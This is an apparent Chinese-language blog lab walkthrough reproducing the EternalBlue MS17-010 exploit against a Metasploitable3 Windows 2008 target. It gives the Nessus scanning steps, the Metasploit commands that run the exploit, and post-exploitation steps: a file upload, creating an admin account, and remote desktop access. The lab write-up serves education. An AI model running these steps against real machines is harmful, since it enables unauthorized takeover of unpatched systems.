Windows靶机永恒之蓝MS17-010漏洞复现

实验目标

扫描windows靶机漏洞,并使用MSF框架利用漏洞攻击靶机,最后成功获得靶机的控制权

实验环境

攻击机:kali 2020.3 (IP地址:192.168.146.147)
靶机:metasploitable3-win2k8r2(win2008,IP地址:192.168.146.145)

实验步骤

一、利用Nessus工具扫描靶机漏洞

  1. 在kali上安装Nessus
    从官网上直接下载安装包安装即可(注意版本)
    Nessus官网地址:https://www.tenable.com
  2. 点击右上角“New Scan”,然后在页面上选择“Basic Network Scan”,填入扫描名字和目标IP,点击“save”,之后启动扫描
    在这里插入图片描述在这里插入图片描述
  3. 扫描结果

在这里插入图片描述
这里我们选择MS17-010漏洞进行攻击

二、MS17-010漏洞复现(利用MSF框架)

  1. 启动MSF
msfconsole
  1. 搜索漏洞
search ms17-010

在这里插入图片描述

  1. 选择利用eternalblue模块(序号为0)
use 0

在这里插入图片描述

  1. 设置攻击参数(主机,端口号等)
set rhosts=192.168.146.145
//设置目标主机IP,端口号一般默认即可
  1. 查看攻击参数
show options
//检查是否有相关参数未设置

在这里插入图片描述

  1. 开始攻击(出现WIN说明可以完全控制靶机)
run

在这里插入图片描述
出现WIN,说明,我们已经成功拿到靶机的控制权

三、在攻击端对靶机进行控制

  1. 在攻击端上传文件到靶机c盘根目录下

(1)攻击端:创建文件并上传该文件至靶机C盘根目录

在这里插入图片描述

upload 文件路径 c:/

在这里插入图片描述
(2)在靶机端可以看到该文件
在这里插入图片描述
在这里插入图片描述

  1. 远程控制靶机桌面

(1)在kali端重新打开一个命令窗口输入:

rdesktop -u 用户名 -p 密码 ip
//靶机的用户名和密码

不知道用户名和密码的可以在kali端通过shell为靶机创建新的用户名和密码,并将新用户添加入管理组
在这里插入图片描述
(2)可以看到在kali端已通过远程桌面连接到目标靶机
在这里插入图片描述
(3)除了上面两种之外,真正能做的事情还有更多,所以一定要安装安全软件,定期打补丁

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值